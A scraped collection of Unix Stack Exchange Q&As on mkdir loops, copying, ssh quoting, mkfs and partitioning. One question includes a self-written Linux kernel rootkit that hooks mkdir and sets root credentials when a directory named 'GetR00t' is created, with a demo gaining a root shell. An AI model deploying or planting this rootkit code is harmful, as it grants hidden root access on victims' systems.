for d in *;
do
cd $d
As far as I can tell this is the error. You've created a loop over your directories d. You cd into $d, but your loop never cd's back out:
done
cd ..
done
So on the second iteration with the second $d, you're still in the first subdir, which of course does not contain the second $d as a subsubdir.
Incidentally, you're ordering by increasing day, %d-%m-%Y. You're free to do that of course, but you might find ordering by year organises the dirs more tidily, %Y-%m-%d.
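As an illustration only, a corrected outer loop might look like this sketch in zsh (the (N) glob qualifier is assumed here so an empty match expands to nothing instead of raising an error):
for d in */; do
    cd "$d" || continue
    mkdir -p jpg raw
    for i in *.jpg(N); do mv -- "$i" jpg/; done   # sort converted JPEGs
    for i in *.NEF(N); do mv -- "$i" raw/; done   # sort raw files
    cd ..   # step back out before the next date directory
done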
| I am trying to make a photo organizer with a zsh shell script, but I am having trouble creating sub-directories within each main directory (based on date). Currently the script starts from a folder I created and gets one argument (the file it needs to edit, hence the first cd $1). Secondly, I do some name changing which is irrelevant for my question. Next I create a directory for each date and move the photo to the correct directory.
The issue is, I want to loop through each date folder and make 2 new sub-directories (jpg and raw). But when I run the code I get an error that there is no such file or directory.
Here is my current script:
#!/bin/zsh.
cd $1
for i in *.JPG;
do
mv $i $(basename $i .JPG).jpg;
done
for i in *;
do
d=$(date -r "$i" +%d-%m-%Y)
mkdir -p "$d"
mv -- "$i" "$d/";
done
for d in *;
do
cd $d
for i in *.jpg;
do
mkdir -p "jpg"
mv -- "$i" "jpg";
done
for i in *.NEF;
do
mkdir -p "raw"
mv -- "$i" "raw";
done
done
If anyone knows where I made a mistake that would be really helpful, since I have no clue what goes wrong and there is no debugger in nano as far as I know.
Error
➜ files sh test2.sh sdcard1
test2.sh: line 16: cd: 05-03-2022: No such file or directory
mv: rename *.jpg to jpg/*.jpg: No such file or directory
mv: rename *.NEF to raw/*.NEF: No such file or directory
test2.sh: line 16: cd: 23-10-2021: No such file or directory
mv: rename *.jpg to jpg/*.jpg: No such file or directory
mv: rename *.NEF to raw/*.NEF: No such file or directory | How can I create sub directories within a directory? [closed] |
The kill command is built into zsh, therefore that is the process involved. mkdir is a separate command.
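You can see the difference from the shell itself; for instance (the exact path reported for mkdir will vary by system):
$ type kill
kill is a shell builtin
$ type mkdir
mkdir is /usr/bin/mkdir
Because kill is a builtin it executes inside the zsh process, which is why current points at your shell; mkdir is a separate program, so current is the short-lived mkdir process.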
|
I am writing my own rootkit to learn about Linux kernels. I wanted to hook into a syscall and alter the credentials of the current task to be that of root (i.e. euid=0). I saw you could do this with unused signals when running kill. If you hooked into kill you could grab the signal, check if it matches the one you set, and then run your function to alter the credentials giving the current user root.
However, this does not work when hooking into other syscalls like mkdir. This is because the current process when running mkdir is mkdir itself. However, the current process when running kill, is my zsh shell, therefore giving me root.
I wanted to get root when hooking mkdir but for the reasons mentioned above, this doesn't work and only changes mkdir to run as root, not my zsh instance.
I was reading some pages from LWN (https://static.lwn.net/images/pdf/LDD3/ch02.pdf) and it says "During the execution of a system call, such as open or read, the current process is the one that invoked the call." That leads me to believe the current process of mkdir should be zsh, as that is the process that invoked the call.
Here is my code hooking into mkdir
static asmlinkage long (*orig_mkdir)(const struct pt_regs *);

asmlinkage int fh_sys_mkdir(const struct pt_regs *regs)
{
void set_root(void);
printk(KERN_INFO "Intercepting mkdir call");
char __user *pathname = (char *)regs->di;
char dir[255] = {0};
long err = strncpy_from_user(dir, pathname, 254);
if (err > 0)
{
printk(KERN_INFO "rootkit: trying to create directory with name: %s\n", dir);
}
if ( (strcmp(dir, "GetR00t") == 0) )
{
//execl(SHELL, "sh", NULL);
printk(KERN_INFO "rootkit: giving root...\n");
set_root();
return 0;
}
printk(KERN_INFO "ORIGINAL CALL");
return orig_mkdir(regs);
}
Here is how I am altering the credentials to achieve root.
void set_root(void)
{
printk(KERN_INFO "set_root called");
printk(KERN_INFO "The process is \"%s\" (pid %i)\n", current->comm, current->pid);
struct cred *root;
root = prepare_creds();
if (root == NULL)
{
printk(KERN_INFO "root is NULL");
return;
}
printk(KERN_INFO "Setting privileges... ");
/* Run through and set all the various *id's of the current user and set them all to 0 (root) */
root->uid.val = root->gid.val = 0;
root->euid.val = root->egid.val = 0;
root->suid.val = root->sgid.val = 0;
root->fsuid.val = root->fsgid.val = 0;
/* Set the credentials to root */
printk(KERN_INFO "Committing creds");
commit_creds(root);
}
Here are the logs showing the pid when I run kill and when I run mkdir:
$ sudo tail /var/log/syslog
[...SNIP...]
Jan 22 10:44:43 kali kernel: [ 6170.003662] The process is "mkdir" (pid 3338) // PID of current process when mkdir is run
Jan 22 10:46:14 kali kernel: [ 6260.534752] The process is "zsh" (pid 1396) // PID of current process when kill is run
Here is a demo of how it works:
┌──(kali㉿kali)-[~/Documents]
└─$ mkdir GetR00t
┌──(kali㉿kali)-[~/Documents]
└─$
----------------------------------------
┌──(kali㉿kali)-[~/Documents]
└─$ kill -64 1
┌──(root💀kali)-[~/Documents]
└─# | why when hooking syscalls from the kernel, is the pid of kill, zsh, but the pid of mkdir is mkdir? |
I hope I understood what you wanted correctly...
#!/bin/bash -e
new_directory=$1
fastq_file=$2
mkdir -p $new_directory/$fastq_file
The script accepts two arguments. The first is the first directory name, the second is the second directory name.
./script 12345 folder2 |
I want to create a script that creates a new folder with the name of the first argument in the directory specified as the second argument.
#!/bin/bash -e
## Passing Arguments (fastq data and directory where generate the output) into this script
$fastq_file
$new_directory
## Create the new directory
mkdir $new_directory/$fastq_file
#I have also tried mkdir "$new_directory"/"$fastq_file"
After saving and closing
I have tried to run the script with this
my_script 12345.fastq ./
The desired output should be a new folder in the current directory called 12345
If the user instead of my_script 12345.fastq ./ would have been my_script 12345.fastq /home/folder1/folder2
I would like to get a new folder called 12345 in the directory /home/folder1/folder2
However, after many attempts I always get the error: mkdir: cannot create directory `/': File exists
| Creating a directory from many variables |
Your script can't do what you want. As written, it will only ever copy files on remote hosts to /tmp/$SG/$i on the same remote host.
You need to use scp instead of ssh and cp. For example:
SG=rohos
date
for i in $(awk "/$SG-/ {print \$2}" /etc/hosts); do
echo "Logging into $i"
mkdir -p "/tmp/$SG/$i"
scp -i /root/.ssh/vm_private_key "keyless-user@$i:/var/some.log" "/tmp/${SG}/${i}/"
done
If you want to preserve the timestamps and permissions of the copied files, add -p to the scp command's options, or add -r for a recursive copy of entire directory trees.
See man scp for details of scp and its options.
|
I have multiple VM machines that I am using for studying, and have come up with this script for copying some files from the VMs to my local machine:
SG=rohos; date; for i in `cat /etc/hosts | grep "$SG-" | awk '{print $2}'` ;do echo "Logging into ${i}";ssh -i /root/.ssh/vm_private_key keyless-user@${i} "sudo mkdir -p /tmp/${SG}/${i}; sudo cp /var/some.log /tmp/${SG}/${i}/ ";done
What could be changed in this script so that repeatedly typing the destination directories for mkdir and cp could be avoided? Or if you have a better tool like rsync or something else, please enlighten me.
SG=rohos
date
for i in `cat /etc/hosts | grep "$SG-" | awk '{print $2}'`
do
echo "Logging into ${i}"
ssh -i /root/.ssh/vm_private_key keyless-user@${i} "sudo mkdir -p /tmp/${SG}/${i}; sudo cp /var/some.log /tmp/${SG}/${i}/ "
done | copy files from multiple remote machines to local and create directories for remote machines |
For this answer I used the following tools:
Bash
comm
find
xargs
I recommend you use the GNU versions of the last 3 utilities as they can deal with NUL-delimited records.
First, let's declare some variables. It's necessary to use absolute pathnames in all these variables as we'll be changing directories many times:
# The directories that will be compared
original_dir='/path/to/original/directory'
copy_dir='/path/to/copy/directory'

# Text files where we will save the structure of both directories
original_structure="${HOME}/original_structure.txt"
copy_structure="${HOME}/copy_structure.txt"

# Text files where we will separate each subdirectory
# depending on the action we will perform on them
dirs_to_add="${HOME}/dirs_to_add.txt"
dirs_to_remove="${HOME}/dirs_to_remove.txt"
Save the current structure of both directories:
cd -- "${original_dir}"
find . \! -name '.' -type 'd' -print0 | sort -z > "${original_structure}"

cd -- "${copy_dir}"
find . \! -name '.' -type 'd' -print0 | sort -z > "${copy_structure}"
Save the differences between both structures:
comm -23 -z -- "${original_structure}" "${copy_structure}" > "${dirs_to_add}"
comm -13 -z -- "${original_structure}" "${copy_structure}" > "${dirs_to_remove}"
Create the missing directories:
cd -- "${copy_dir}"
xargs -0 mkdir -p -- < "${dirs_to_add}"
Remove the unwanted directories:
cd -- "${copy_dir}"
xargs -0 rm -rf -- < "${dirs_to_remove}"
Remove the text files we created to save the temporary information:
rm -- "${original_structure}" "${copy_structure}"
rm -- "${dirs_to_add}" "${dirs_to_remove}"
Notes
This method only copies the structure. It doesn't preserve owners, permissions or attributes. I read that some other tools, like rsync, could preserve them, but I have no experience using them.
If you want to put the code above into a script, make sure to implement error handling. For instance, failing to cd into a directory and operating in the incorrect one may lead to catastrophic consequences.
I have a directory that has some subdirectories with files in them. I have another directory that has very similar subdirectories but there may be a few that are added or removed. How can I add and remove subdirectories so the two directories have the same structure?
Is there a simple way to do this using a command or tool? Or do I have to do something more complicated like search through every subdirectory and check if it has a matching one?
| How to make sure directory only has specific subdirectories? |
Solution found
ssh remote mkdir -p -v 'I\ want\ to\ create\ long\ dirname\ with\ spaces'
I don't understand why it is different on the remote and I have to escape with \.
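For what it's worth, the likely explanation is that ssh joins its arguments into a single string and hands it to the remote shell, which parses that string again; the quotes you typed were already consumed by the local shell, so the remote shell sees unquoted words. A second layer of quoting works as well as the backslashes, for example:
ssh remote 'mkdir -p -v "I want to create long dir name with spaces"'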
| Two Slackware 14.2 systems, ssh is 7.9p1.
On local system
mkdir -p -v "I want to create long dir name with spaces"
mkdir: directory 'I want to create long dir name with spaces' created
And it is OK.
On remote
ssh remote mkdir -p -v "I want to create long dir name with spaces"
mkdir: created directory 'I'
mkdir: created directory 'want'
mkdir: created directory 'to'
mkdir: created directory 'create'
mkdir: created directory 'long'
mkdir: created directory 'dir'
mkdir: created directory 'name'
mkdir: created directory 'with'
mkdir: created directory 'spaces'Why?
I have tried using ' instead of " and
ssh remote mkdir -p -v 'I want to create long dir name with spaces'
Exits with 0 (success) but no dir is created.
| Why mkdir with ssh doesn't want create longname dir? [duplicate] |
I solved it like this
#!/bin/bash
for f in {100..2} ; do mv $f $((f+1)); done
x="?_1"
y=$(echo $x | cut -b 1-1)
mv $x $y
It's very manual, but solves the initial problem faster.
|
I have x number of folders
folder1
folder2
folder3
......
folder100
What I want to do is:
add folder2
reorder
So now:
folder1
folder2
folder3
......
folder101
So now, the folder that was folder2 is folder3, etc.
Example:
folder2 -> folder3, folder3 -> folder4, folder4 -> folder5
The folder1 remain intact.
To be more precise I want to automate this
$ mkdir 1 2 3 4 5
$ ls
1 2 3 4 5
$ mkdir 2_1
$ ls
1 2 2_1 3 4 5
$ mv 5 6
$ ls
1 2 2_1 3 4 6
$ mv 4 5
$ mv 3 4
$ mv 2 3
$ mv 2_1 2
$ ls
1 2 3 4 5 6
$
How do I do this in bash?
| Add a folder in a sequence of folders and rename the other folders |
It is not limited to a fixed number of dirs, so whether you want to create 2, 3, or spend your entire life creating directories and sub-directories until causing an explosion, here is the script:
#!/bin/bash
enter_recursive(){
while true; do
echo "Please enter the name of the directory you want to create inside $PWD or type _up to exit the directory"
read dir
[ "$dir" = "_up" ] && return
mkdir "$dir"
echo -n "Do you want to create subdirectories in $PWD/${dir}? (y/n)"
read -n1 yn
echo
if [ "$yn" == "y" ]; then
cd "$dir"
enter_recursive
cd ..
fi
done
}

enter_recursive |
On my CentOS machine, I need to create a main directory inside which I will have a few sub directories and, inside them, some subsubdirectories.
Something like:
main_directory->sub1,sub2,sub3..
sub1->subsub1,subsub2,subsub3..
sub2->subsub1,subsub2,subsub3..
sub3->subsub1,subsub2,subsub3..
I want to create this kind of directory structure using a loop and using mkdir inside the loop. Also, I want the user to input all these directory, sub directory and sub sub directory names. How can I do this?
| Sub Directories in sub directory using loop |
Creating a filesystem on a whole disk rather than a partition is possible, but unusual. The documentation only explicitly mentions the partition because that's the most usual case (it does say usually). You can create a filesystem on anything that acts sufficiently like a fixed-size file, i.e. something where if you write data at a certain location and read back from the same location then you get back the same data. This includes whole disks, disk partitions, and other kinds of block devices, as well as regular files (disk images).
After doing mkfs.fat -n A /dev/sdb, you no longer have a partition on that disk. Beware that the kernel still thinks that the disk has a partition, because it keeps the partition table cached in memory. But you shouldn't try to use /dev/sdb1 anymore, since it no longer exists; writing to it would corrupt the filesystem you created on /dev/sdb since /dev/sdb1 is a part of /dev/sdb (everything except a few hundred bytes at the beginning). Run the command partprobe as root to tell the kernel to re-read the partition table.
While creating a filesystem on a whole disk is possible, I don't recommend it. Some operating systems may have problems with it (I think Windows would cope but some devices such as cameras might not), and you lose the possibility of creating other partitions. See also The merits of a partitionless filesystem
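If you do go the conventional route instead, a minimal sketch might be (assuming the stick is still /dev/sdb and you want a single FAT partition — adjust the device name to yours):
parted -s /dev/sdb mklabel msdos mkpart primary fat32 1MiB 100%
partprobe /dev/sdb          # make the kernel re-read the new partition table
mkfs.fat -n A /dev/sdb1     # format the partition, not the whole disk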
|
I have a pen drive and one partition:
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 931.5G 0 disk
└─sda1 8:1 0 931.5G 0 part /
sdb 8:16 1 7.5G 0 disk
└─sdb1 8:17 1 7.5G 0 partand I have formatted with command:
# mkfs.fat -n A /dev/sdb
and it works fine.
But after that, I skimmed through the man page for mkfs:
mkfs is used to build a Linux filesystem on a device, usually a hard
disk partition. The device argument is either the device name (e.g.
/dev/hda1, /dev/sdb2), or a regular file that shall contain the
filesystem. The size argument is the number of blocks to be used for
the filesystem.
It says mkfs should work on a partition. And my problem is: why does my operation work without an error prompt?
| Is it ok to mkfs without partition number? |
Do you have /sbin in your path?
Most likely you are trying to run mkfs.ext4 as a normal user.
Unless you've added it yourself (e.g. in ~/.bashrc or /etc/profile etc), root has /sbin and /usr/sbin in $PATH, but normal users don't by default.
Try running it from a root shell (e.g. after sudo -i) or as:
sudo mkfs.ext4 -L hdd_misha /dev/sdb1
BTW, normal users usually don't have the necessary permissions to use mkfs to format a partition (although they can format a disk-image file that they own - e.g. for use with FUSE or in a VM with, say, VirtualBox).
Formatting a partition requires root privs unless someone has seriously messed up the block device permissions in /dev.
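A quick way to check is something like the following (the /sbin location is an assumption based on Debian's usual layout):
echo "$PATH"                                  # is /sbin or /usr/sbin listed?
ls -l /sbin/mkfs.ext4                         # the binary normally lives here on Debian
sudo /sbin/mkfs.ext4 -L hdd_misha /dev/sdb1   # calling it by full path sidesteps PATH entirely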
|
I have just installed Debian 8.4 (Jessie, MATE desktop). For some reason the following command is not recognized:
mkfs.ext4 -L hdd_misha /dev/sdb1
The error I get:
bash: mkfs.ext4: command not found
I have googled and I actually can't seem to find Debian-specific instructions on how to create an ext4 filesystem. Any help much appreciated!
| mkfs.ext4 command not found in Debian (Jessie) |
Alignment doesn’t matter for the end sector, at least not for performance reasons. Alignment of the start sector affects all the sectors in the partition; alignment of the last sector only affects the last few sectors of the partition, if at all.
Sectors are numbered from 0; fdisk is suggesting the last sector on your disk (which has 250069680 sectors).
Start: 2048
End: 250069679
Sectors: 250067632
is correct: 250069679 minus 2048 plus one is 250067632. The partition contains 250067632 sectors, starting at offset 2048. Note that this is aligned to 4096 bytes: 250067632 is a multiple of 8 (the sectors contain 512 bytes here, and 8×512 is 4096).
Depending on how you use the partition, alignment of the end sector might be important; for example, if you’re partitioning a 512e disk (a disk which uses 4096-byte sectors internally, but exposes 512-byte logical sectors), and want to use it with cryptsetup and 4096-byte blocks to improve performance (cryptsetup luksFormat --sector-size=4096), you’ll have to ensure that the partition contains an exact multiple of 4096 bytes (not sectors).
|
I am wondering what Start and End value to choose when partitioning my ext. SSD using fdisk.
fdisk suggests 2048-250069679, default 2048 but 250069679 cannot be divided by 512 nor by 2048. Wouldn't it be better to set the Start and End value to a number that can be divided by 512 or 2048 or 4096?
For example: Start 4096 and End 250068992
Command (m for help): p
Disk /dev/sda: 119,2 GiB, 128035676160 bytes, 250069680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa4b57300

Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-250069679, default 2048):
Last sector, +sectors or +size{K,M,G,T,P} (2048-250069679, default 250069679):
Created a new partition 1 of type 'Linux' and of size 119,2 GiB.

Command (m for help): p
Disk /dev/sda: 119,2 GiB, 128035676160 bytes, 250069680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa4b57300

Device Boot Start End Sectors Size Id Type
/dev/sda1 2048 250069679 250067632 119,2G 83 Linux

Command (m for help): i
Selected partition 1
Device: /dev/sda1
Start: 2048
End: 250069679
Sectors: 250067632
Cylinders: 15566
Size: 119,2G
Id: 83
Type: Linux
Start-C/H/S: 0/32/33
End-C/H/S: 206/29/63

mkfs.ext4 /dev/sda1
mke2fs 1.43.4 (31-Jan-2017)
Creating filesystem with 31258454 (4k) blocks and 7815168 inodes
Filesystem UUID: fdce9286-4545-447c-9cca-7d67f5bb9f43
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872

fdisk -l
Disk /dev/sda: 119,2 GiB, 128035676160 bytes, 250069680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa4b57300

Device Boot Start End Sectors Size Id Type
/dev/sda1 2048 250069679 250067632 119,2G 83 Linux
And how can it be that the Sectors number is lower than the End value?
Command (m for help): i
Selected partition 1
Device: /dev/sda1
Start: 2048
End: 250069679
Sectors: 250067632
Cylinders: 15566
Size: 119,2G
Id: 83
Type: Linux
Start-C/H/S: 0/32/33
End-C/H/S: 206/29/63 | How to calculate partition Start End Sector? |
You want to format a partition in a disk-image file, rather than the entire image file. In that case, you need to use losetup to tell linux to use the image file as a loopback device.
NOTE: losetup requires root privileges, so must be run as root or with sudo. The /dev/loop* devices it uses/creates also require root privs to access and use.
e.g (as root)
# losetup /dev/loop0 ./sdcard.img

# fdisk -l /dev/loop0
Disk /dev/loop0: 1 MiB, 1048576 bytes, 2048 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x54c246ab

Device Boot Start End Sectors Size Id Type
/dev/loop0p1 1 1023 1023 511.5K c W95 FAT32 (LBA)
/dev/loop0p2 1024 2047 1024 512K 83 Linux

# file -s /dev/loop0p1
/dev/loop0p1: data

# mkfs.vfat /dev/loop0p1
mkfs.fat 3.0.28 (2015-05-16)
Loop device does not match a floppy size, using default hd params

# file -s /dev/loop0p1
/dev/loop0p1: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "mkfs.fat", sectors/cluster 4, root entries 512, sectors 1023 (volumes <=32 MB) , Media descriptor 0xf8, sectors/FAT 1, sectors/track 32, heads 64, serial number 0xfa9e3726, unlabeled, FAT (12 bit)
and, finally, detach the image from the loopback device:
# losetup -d /dev/loop0
See man losetup for more details.
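As an aside, reasonably recent versions of losetup can pick a free device and scan the partition table in one step; a sketch (the two-partition layout is assumed from the question):
ld=$(losetup --show --find --partscan ./sdcard.img)
mkfs.vfat "${ld}p1"     # e.g. /dev/loop0p1
mkfs.ext4 "${ld}p2"     # adjust to your actual partition layout
losetup -d "$ld"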
|
I am creating an empty file...
dd if=/dev/zero of=${SDCARD} bs=1 count=0 seek=$(expr 1024 \* ${SDCARD_SIZE})
...then turning it into a drive image...
parted -s ${SDCARD} mklabel msdos
...and creating partitions on it
parted -s ${SDCARD} unit KiB mkpart primary fat32 ${IMAGE_ROOTFS_ALIGNMENT} $(expr ${IMAGE_ROOTFS_ALIGNMENT} \+ ${BOOT_SPACE_ALIGNED})
parted -s ${SDCARD} unit KiB mkpart primary $(expr ${IMAGE_ROOTFS_ALIGNMENT} \+ ${BOOT_SPACE_ALIGNED}) $(expr ${IMAGE_ROOTFS_ALIGNMENT} \+ ${BOOT_SPACE_ALIGNED} \+ $ROOTFS_SIZE)
How do I use mkfs.ext and mkfs.vfat without mounting this image?
| How to run mkfs on file image partitions without mounting? |
A partition can have a type. The partition type is a hint as in "this partition is designated to serve a certain function". Many partition types are associated with certain file-systems, though the association is not always strict or unambiguous. You can expect a partition of type 0x07 to have a Microsoft compatible file-system (e.g. FAT, NTFS or exFAT) and 0x83 to have a native Linux file-system (e.g. ext2/3/4).
The creation of the file-system is indeed a completely independent and orthogonal step (you can put whatever file-system wherever you want – just do not expect things to work out of the box).
parted defines the partition as in "a part of the overall disk". It does not actually need to know the partition type (the parameter is optional). In use however, auto-detection of the file-system and henceforth auto-mounting may not work properly if the partition type does not correctly hint to the file-system.
A partition is a strictly linear piece of storage space. The mkfs.ext4 and its variants create file-systems so you can have your actual directory tree where you can conveniently store your named files in.
|
I am partitioning a disk with the intent to have an ext4 filesystem on the partition. I am following a tutorial, which indicates that there are two separate steps where the ext4 filesystem needs to be specified. The first is by parted when creating the partition:
sudo parted -a opt /dev/sda mkpart primary ext4 0% 100%
The second is by the mkfs.ext4 utility, which creates the filesystem itself:
sudo mkfs.ext4 -L datapartition /dev/sda1
My question is: what exactly are each of these tools doing? Why is ext4 required when creating the partition? I would have thought the defining of the partition itself was somewhat independent of the constituent file system.
(The tutorial I'm following is here: https://www.digitalocean.com/community/tutorials/how-to-partition-and-format-storage-devices-in-linux)
| Why does parted need a filesystem type when creating a partition, and how does its action differ from a utility like mkfs.ext4? |
Or you could simply use ext2
For ext4:
mke2fs -t ext4 -O ^has_journal,^uninit_bg,^ext_attr,^huge_file,^64bit [/dev/device or /path/to/file]
man ext4 contains a whole lot of features you can disable (using ^).
|
I have a small "rescue" system (16MB) that I boot into RAM as ramdisk. The initrd disk that I am preparing needs to be formatted. I think ext4 will do fine, but obviously, it doesn't make any sense to use journal or other advanced ext4 features.
How can I create the most minimal ext4 filesystem?
without journal
without any lazy_init
without any extended attributes
without ACL
without large files
without resizing support
without any unnecessary metadata
The most bare minimum filesystem possible?
| Minimalistic ext4 filesystem without journal and other advanced features |
TRIM is a command that needs to be sent for individual blocks. I have asked the question before (What is the recommended way to empty a SSD?) and it is suggested to use ATA Secure Erase, a command that is sent to the device to clear all data.
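If the goal is simply to start from a fully discarded drive before installing, two common routes are a whole-device discard or an ATA Secure Erase; a rough sketch (the device name is a placeholder, and both destroy all data):
sudo blkdiscard /dev/sdX                                    # issue a discard (TRIM) for every block
# or, roughly, the ATA Secure Erase route:
sudo hdparm --user-master u --security-set-pass p /dev/sdX
sudo hdparm --user-master u --security-erase p /dev/sdX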
|
Will a standard fresh linux (Ubuntu 11.10 to be exact) install and drive re-format (full) successfully TRIM my SSD, or do I need to do something extra?
I know that ext4 will TRIM blocks on erase when I specify the discard option, but I want to start with a completely TRIMmed drive if possible.
| Will formatting my drive TRIM my SSD? |
This is due to the fact that the hyperconverged hypervisor uses SSD's. The mkfs command formats with NODISCARD (also known as TRIM) by default.
To run mkfs without trim, use the -K option on XFS and -E nodiscard on ext4
XFS
mkfs.xfs -K /dev/sdx
EXT4
mkfs.ext4 -E nodiscard
Warning: Only use -K or -E on new volumes with no existing data.
Using the -K or -E options on drives with existing data, will cause the space to be wasted until the data is overwritten.
|
Formatting xfs volumes on ubuntu 16.04 is extremely slow in our Virtualbox hypervisor, but not vms running inside Nutanix.
Virtualbox
100 GB => seconds
2TB => seconds
Nutanix (HyperConverged)
100 GB => 4 minutes
2TB => 30+ minutes
parted -l -s | grep "Error: * unrecognised disk label"
Error: /dev/sdg: unrecognised disk label

parted /dev/sdg mklabel gpt
Information: You may need to update /etc/fstab.

parted -- /dev/sdg mkpart primary xfs 1 -1
Information: You may need to update /etc/fstab.

time mkfs.xfs /dev/sdg1
meta-data=/dev/sdg1 isize=512 agcount=4, agsize=6553472 blks
= sectsz=4096 attr=2, projid32bit=1
= crc=1 finobt=1, sparse=0
data = bsize=4096 blocks=26213888, imaxpct=25
= sunit=0 swidth=0 blks
naming =version 2 bsize=4096 ascii-ci=0 ftype=1
log =internal log bsize=4096 blocks=12799, version=2
= sectsz=4096 sunit=1 blks, lazy-count=1
realtime =none extsz=4096 blocks=0, rtextents=0

real 4m7.653s
user 0m0.004s
sys 0m0.028sWhy does it take so long in one hypervisor to format a drive with mkfs, whereas on the other it is nearly instant?
| mkfs is extremely slow |
You could use GUI applications like GParted on Ubuntu.
Install them from the repositories using:
sudo apt-get install gparted
Once you have it installed, select the correct block device/partition and format it using a filesystem like ext2/3/4, JFS, XFS, ReiserFS, etc. depending on your needs.
However, the above mentioned file systems are only for reference. Not all of them run on all distributions perfectly.
For example, as @Nils pointed out: ReiserFS is not supported any more on some major distributions.
JFS and XFS can be too new for some distributions.
Ext2 is too old.
Ext2 is almost a legacy file system now and not a very good choice.
That leaves only Ext3 and Ext4.
Again, since ext4 is still new and under development, it may have problems with a few distributions. For example, on RH5 there is no ext4, on SLES10 it is a bit dicey. However, I should point out here that the vanilla Linux kernel completely supports ext4 since version 2.6.28. On Arch and Gentoo ext4 gives no problems.
But ext3 will work on any current distribution - not only the newest ones.
|
How do I format my external hard drive to a very Linux compatible file system?
| Format external hard drive to linux compatible file system |
LVM doesn't change the way you format a partition. Let's say you would have a volume group called group1 and a logical volume called volume1 then your command should look like this for ext3:
mkfs.ext3 /dev/group1/volume1
In case you don't have any volume groups or logical volumes yet, you have to use the appropriate LVM tools to create them. The man pages of vgcreate and lvcreate can tell you how to do that.
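If you still need to create them, a rough sketch using the two partitions mentioned in the question (the names group1 and volume1 are just examples):
pvcreate /dev/sdb5 /dev/sdc5             # mark the partitions as LVM physical volumes
vgcreate group1 /dev/sdb5 /dev/sdc5      # group them into one volume group
lvcreate -n volume1 -l 100%FREE group1   # carve out a logical volume from all the free space
mkfs.ext3 /dev/group1/volume1            # then format it as above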
| I need to format a partition.
But I have one LVM on my machine (VirtualBox) that is composed of two different partitions from two virtual HDDs (sdb5 and sdc5).
fdisk output
df output | How to Format an LVM partition [closed] |
I actually suspect you are being bitten by a much-talked-about ext4 corruption bug in kernels 3 and 4. Have a look at this thread,
http://bugzilla.kernel.org/show_bug.cgi?id=89621
There have been constant reports of corruption bugs with ext4 file systems, with varying setups. Lots of people complaining in forums. The bug seems to affect more people with RAID configurations.
However, they are supposedly fixed in 4.0.3.
"4.0.3 includes a fix for a critical ext4 bug that can result in major data loss."
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=785672
There are other ext4 bugs, including bugs fixed as of the 30th of November [of 2015].
https://lists.ubuntu.com/archives/foundations-bugs/2015-November/259035.html
There is also here a very interesting article talking about configuration options in ext4, and possible corruption with it with power failures.
http://www.pointsoftware.ch/en/4-ext4-vs-ext3-filesystem-and-why-delayed-allocation-is-bad/
I would test the card with other filesystem other than ext4, maybe ext3.
Those systematic bugs with ext4 are one of the reasons I am using linux-image-4.3.0-0.bpo.1-amd64 from the debian backports repository in Jessie in my server farm at work.
Your version in particular, kernel 3.13 seems to be more affected by the bug.
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1298972
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1389787
I would not put it aside maybe some combination of configuration and hardware at your side is triggering the bug more than usual.
SD cards also go bad with wear and tear, and due to the journaling, an ext4 filesystem is not ideal for an SD card. As a curiosity, I am using a Lamobo R1 and using the SD card just for booting the kernel, with an SSD disk.
http://linux-sunxi.org/Lamobo_R1
|
I am trying to format an sdcard following this guide. I am able to successfully create the partition table, but attempting to format the Linux partition with mkfs yields the following output:
mke2fs 1.42.9 (4-Feb-2014)
Discarding device blocks: 4096/1900544
where it appears to hang indefinitely. I have left the process running for a while but nothing changes. If I eject the sdcard then mkfs writes the expected output to the terminal:
mke2fs 1.42.9 (4-Feb-2014)
Discarding device blocks: failed - Input/output error
Warning: could not erase sector 2: Attempt to write block to filesystem resulted in short write
warning: 512 blocks unused.Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
476064 inodes, 1900544 blocks
95026 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=1946157056
58 block groups
32768 blocks per group, 32768 fragments per group
8208 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632Allocating group tables: done
Warning: could not read block 0: Attempt to read block from filesystem resulted in short read
Warning: could not erase sector 0: Attempt to write block to filesystem resulted in short write
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: 0/58
Warning, had trouble writing out superblocks.
Why is mkfs reporting that we are "discarding" blocks and what might be causing the hangup?
EDIT
I am able to successfully create two partitions -- one at 100MB and the other 7.3GB. I then can format, and mount, the 100MB partition as FAT32 -- it's the ext4 7.3GB partition that is having this trouble.
dmesg is flooded with:
[ 9350.097112] mmc0: Got data interrupt 0x02000000 even though no data operation was in progress.
[ 9360.122946] mmc0: Timeout waiting for hardware interrupt.
[ 9360.125083] mmc_erase: erase error -110, status 0x0
[ 9360.125086] end_request: I/O error, dev mmcblk0, sector 3096576
EDIT 2
It appears the problem manifests when I am attempting to format as ext4. If I format the 7.3GB partition as FAT32, as an example, the operation succeeds.
EDIT 3
To interestingly conclude the above, I inserted the sdcard into a BeagleBone and formatted it in the exact same way I was on Mint and everything worked flawlessly. I removed the sdcard, reinserted it into my main machine and finished copying over the data to the newly created and formatted partitions.
| Formatting an sdcard with mkfs hangs indefinitely |
On BSD-derived Unix systems, newfs is more commonly used than mkfs.
